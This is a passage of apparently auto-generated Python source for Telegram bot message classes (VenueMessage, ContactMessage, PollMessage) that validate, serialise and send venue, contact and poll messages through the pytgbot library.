from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(VenueMessage, self).to_array()
array['latitude'] = float(self.latitude) # type float
array['longitude'] = float(self.longitude) # type float
array['title'] = u(self.title) # py2: type unicode, py3: type str
array['address'] = u(self.address) # py2: type unicode, py3: type str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['foursquare_id'] = u(self.foursquare_id) # py2: type unicode, py3: type str
array['foursquare_type'] = u(self.foursquare_type) # py2: type unicode, py3: type str
array['google_place_id'] = u(self.google_place_id) # py2: type unicode, py3: type str
array['google_place_type'] = u(self.google_place_type) # py2: type unicode, py3: type str
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the VenueMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(VenueMessage, VenueMessage).validate_array(array)
data['latitude'] = float(array.get('latitude'))
data['longitude'] = float(array.get('longitude'))
data['title'] = u(array.get('title'))
data['address'] = u(array.get('address'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['foursquare_id'] = u(array.get('foursquare_id')) if array.get('foursquare_id') is not None else None
data['foursquare_type'] = u(array.get('foursquare_type')) if array.get('foursquare_type') is not None else None
data['google_place_id'] = u(array.get('google_place_id')) if array.get('google_place_id') is not None else None
data['google_place_type'] = u(array.get('google_place_type')) if array.get('google_place_type') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new VenueMessage from a given dictionary.
:return: new VenueMessage instance.
:rtype: VenueMessage
"""
if not array: # None or {}
return None
# end if
data = VenueMessage.validate_array(array)
return VenueMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(venuemessage_instance)`
"""
return "VenueMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, title={self.title!r}, address={self.address!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, foursquare_id={self.foursquare_id!r}, foursquare_type={self.foursquare_type!r}, google_place_id={self.google_place_id!r}, google_place_type={self.google_place_type!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(venuemessage_instance)`
"""
return "VenueMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, title={self.title!r}, address={self.address!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, foursquare_id={self.foursquare_id!r}, foursquare_type={self.foursquare_type!r}, google_place_id={self.google_place_id!r}, google_place_type={self.google_place_type!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in venuemessage_instance`
"""
return (
key in ["latitude", "longitude", "title", "address", "receiver", "reply_id", "foursquare_id", "foursquare_type", "google_place_id", "google_place_type", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class VenueMessage
class ContactMessage(ReturnableMessageBase):
"""
Use this method to send phone contacts. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendcontact
Parameters:
:param phone_number: Contact's phone number
:type phone_number: str|unicode
:param first_name: Contact's first name
:type first_name: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param last_name: Contact's last name
:type last_name: str|unicode
:param vcard: Additional data about the contact in the form of a vCard, 0-2048 bytes
:type vcard: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, phone_number, first_name, receiver=None, reply_id=DEFAULT_MESSAGE_ID, last_name=None, vcard=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send phone contacts. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendcontact
Parameters:
:param phone_number: Contact's phone number
:type phone_number: str|unicode
:param first_name: Contact's first name
:type first_name: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param last_name: Contact's last name
:type last_name: str|unicode
:param vcard: Additional data about the contact in the form of a vCard, 0-2048 bytes
:type vcard: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(ContactMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(phone_number, unicode_type, parameter_name="phone_number")
self.phone_number = phone_number
assert_type_or_raise(first_name, unicode_type, parameter_name="first_name")
self.first_name = first_name
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(last_name, None, unicode_type, parameter_name="last_name")
self.last_name = last_name
assert_type_or_raise(vcard, None, unicode_type, parameter_name="vcard")
self.vcard = vcard
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_contact(
phone_number=self.phone_number,
first_name=self.first_name,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
last_name=self.last_name,
vcard=self.vcard,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this ContactMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(ContactMessage, self).to_array()
array['phone_number'] = u(self.phone_number) # py2: type unicode, py3: type str
array['first_name'] = u(self.first_name) # py2: type unicode, py3: type str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['last_name'] = u(self.last_name) # py2: type unicode, py3: type str
array['vcard'] = u(self.vcard) # py2: type unicode, py3: type str
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the ContactMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(ContactMessage, ContactMessage).validate_array(array)
data['phone_number'] = u(array.get('phone_number'))
data['first_name'] = u(array.get('first_name'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['last_name'] = u(array.get('last_name')) if array.get('last_name') is not None else None
data['vcard'] = u(array.get('vcard')) if array.get('vcard') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new ContactMessage from a given dictionary.
:return: new ContactMessage instance.
:rtype: ContactMessage
"""
if not array: # None or {}
return None
# end if
data = ContactMessage.validate_array(array)
return ContactMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(contactmessage_instance)`
"""
return "ContactMessage(phone_number={self.phone_number!r}, first_name={self.first_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, last_name={self.last_name!r}, vcard={self.vcard!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(contactmessage_instance)`
"""
return "ContactMessage(phone_number={self.phone_number!r}, first_name={self.first_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, last_name={self.last_name!r}, vcard={self.vcard!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in contactmessage_instance`
"""
return (
key in ["phone_number", "first_name", "receiver", "reply_id", "last_name", "vcard", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class ContactMessage
class PollMessage(ReturnableMessageBase):
"""
Use this method to send a native poll. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendpoll
Parameters:
:param question: Poll question, 1-300 characters
:type question: str|unicode
:param options: A JSON-serialized list of answer options, 2-10 strings 1-100 characters each
:type options: list of str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param is_anonymous: True, if the poll needs to be anonymous, defaults to True
:type is_anonymous: bool
:param type: Poll type, "quiz" or "regular", defaults to "regular"
:type type: str|unicode
:param allows_multiple_answers: True, if the poll allows multiple answers, ignored for polls in quiz mode, defaults to False
:type allows_multiple_answers: bool
:param correct_option_id: 0-based identifier of the correct answer option, required for polls in quiz mode
:type correct_option_id: int
:param explanation: Text that is shown when a user chooses an incorrect answer or taps on the lamp icon in a quiz-style poll, 0-200 characters with at most 2 line feeds after entities parsing
:type explanation: str|unicode
:param explanation_parse_mode: Mode for parsing entities in the explanation. See formatting options for more details.
:type explanation_parse_mode: str|unicode
:param explanation_entities: A JSON-serialized list of special entities that appear in the poll explanation, which can be specified instead of parse_mode
:type explanation_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param open_period: Amount of time in seconds the poll will be active after creation, 5-600. Can't be used together with close_date.
:type open_period: int
:param close_date: Point in time (Unix timestamp) when the poll will be automatically closed. Must be at least 5 and no more than 600 seconds in the future. Can't be used together with open_period.
:type close_date: int
:param is_closed: Pass True, if the poll needs to be immediately closed. This can be useful for poll preview.
:type is_closed: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, question, options, receiver=None, reply_id=DEFAULT_MESSAGE_ID, is_anonymous=None, type=None, allows_multiple_answers=None, correct_option_id=None, explanation=None, explanation_parse_mode=None, explanation_entities=None, open_period=None, close_date=None, is_closed=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send a native poll. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendpoll
Parameters:
:param question: Poll question, 1-300 characters
:type question: str|unicode
:param options: A JSON-serialized list of answer options, 2-10 strings 1-100 characters each
:type options: list of str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param is_anonymous: True, if the poll needs to be anonymous, defaults to True
:type is_anonymous: bool
:param type: Poll type, "quiz" or "regular", defaults to "regular"
:type type: str|unicode
:param allows_multiple_answers: True, if the poll allows multiple answers, ignored for polls in quiz mode, defaults to False
:type allows_multiple_answers: bool
:param correct_option_id: 0-based identifier of the correct answer option, required for polls in quiz mode
:type correct_option_id: int
:param explanation: Text that is shown when a user chooses an incorrect answer or taps on the lamp icon in a quiz-style poll, 0-200 characters with at most 2 line feeds after entities parsing
:type explanation: str|unicode
:param explanation_parse_mode: Mode for parsing entities in the explanation. See formatting options for more details.
:type explanation_parse_mode: str|unicode
:param explanation_entities: A JSON-serialized list of special entities that appear in the poll explanation, which can be specified instead of parse_mode
:type explanation_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param open_period: Amount of time in seconds the poll will be active after creation, 5-600. Can't be used together with close_date.
:type open_period: int
:param close_date: Point in time (Unix timestamp) when the poll will be automatically closed. Must be at least 5 and no more than 600 seconds in the future. Can't be used together with open_period.
:type close_date: int
:param is_closed: Pass True, if the poll needs to be immediately closed. This can be useful for poll preview.
:type is_closed: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(PollMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(question, unicode_type, parameter_name="question")
self.question = question
assert_type_or_raise(options, list, parameter_name="options")
self.options = options
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(is_anonymous, None, bool, parameter_name="is_anonymous")
self.is_anonymous = is_anonymous
assert_type_or_raise(type, None, unicode_type, parameter_name="type")
self.type = type
assert_type_or_raise(allows_multiple_answers, None, bool, parameter_name="allows_multiple_answers")
self.allows_multiple_answers = allows_multiple_answers
assert_type_or_raise(correct_option_id, None, int, parameter_name="correct_option_id")
self.correct_option_id = correct_option_id
assert_type_or_raise(explanation, None, unicode_type, parameter_name="explanation")
self.explanation = explanation
assert_type_or_raise(explanation_parse_mode, None, unicode_type, parameter_name="explanation_parse_mode")
self.explanation_parse_mode = explanation_parse_mode
assert_type_or_raise(explanation_entities, None, list, parameter_name="explanation_entities")
self.explanation_entities = explanation_entities
assert_type_or_raise(open_period, None, int, parameter_name="open_period")
self.open_period = open_period
assert_type_or_raise(close_date, None, int, parameter_name="close_date")
self.close_date = close_date
assert_type_or_raise(is_closed, None, bool, parameter_name="is_closed")
self.is_closed = is_closed
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_poll(
question=self.question,
options=self.options,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
is_anonymous=self.is_anonymous,
type=self.type,
allows_multiple_answers=self.allows_multiple_answers,
correct_option_id=self.correct_option_id,
explanation=self.explanation,
explanation_parse_mode=self.explanation_parse_mode,
explanation_entities=self.explanation_entities,
open_period=self.open_period,
close_date=self.close_date,
is_closed=self.is_closed,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this PollMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(PollMessage, self).to_array()
array['question'] = u(self.question) # py2: type unicode, py3: type str
array['options'] = PytgbotApiBot._as_array(self.options) # type list of str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['is_anonymous'] = bool(self.is_anonymous) # type bool
array['type'] = u(self.type) # py2: type unicode, py3: type str
array['allows_multiple_answers'] = bool(self.allows_multiple_answers) # type bool
array['correct_option_id'] = int(self.correct_option_id) # type int
array['explanation'] = u(self.explanation) # py2: type unicode, py3: type str
array['explanation_parse_mode'] = u(self.explanation_parse_mode) # py2: type unicode, py3: type str
array['explanation_entities'] = PytgbotApiBot._as_array(self.explanation_entities) # type list of MessageEntity
array['open_period'] = int(self.open_period) # type int
array['close_date'] = int(self.close_date) # type int
array['is_closed'] = bool(self.is_closed) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the PollMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(PollMessage, PollMessage).validate_array(array)
data['question'] = u(array.get('question'))
data['options'] = TgBotApiObject._builtin_from_array_list(required_type=unicode_type, value=array.get('options'), list_level=1)
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['is_anonymous'] = bool(array.get('is_anonymous')) if array.get('is_anonymous') is not None else None
data['type'] = u(array.get('type')) if array.get('type') is not None else None
data['allows_multiple_answers'] = bool(array.get('allows_multiple_answers')) if array.get('allows_multiple_answers') is not None else None
data['correct_option_id'] = int(array.get('correct_option_id')) if array.get('correct_option_id') is not None else None
data['explanation'] = u(array.get('explanation')) if array.get('explanation') is not None else None
data['explanation_parse_mode'] = u(array.get('explanation_parse_mode')) if array.get('explanation_parse_mode') is not None else None
data['explanation_entities'] = MessageEntity.from_array_list(array.get('explanation_entities'), list_level=1) if array.get('explanation_entities') is not None else None
data['open_period'] = int(array.get('open_period')) if array.get('open_period') is not None else None
data['close_date'] = int(array.get('close_date')) if array.get('close_date') is not None else None
data['is_closed'] = bool(array.get('is_closed')) if array.get('is_closed') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
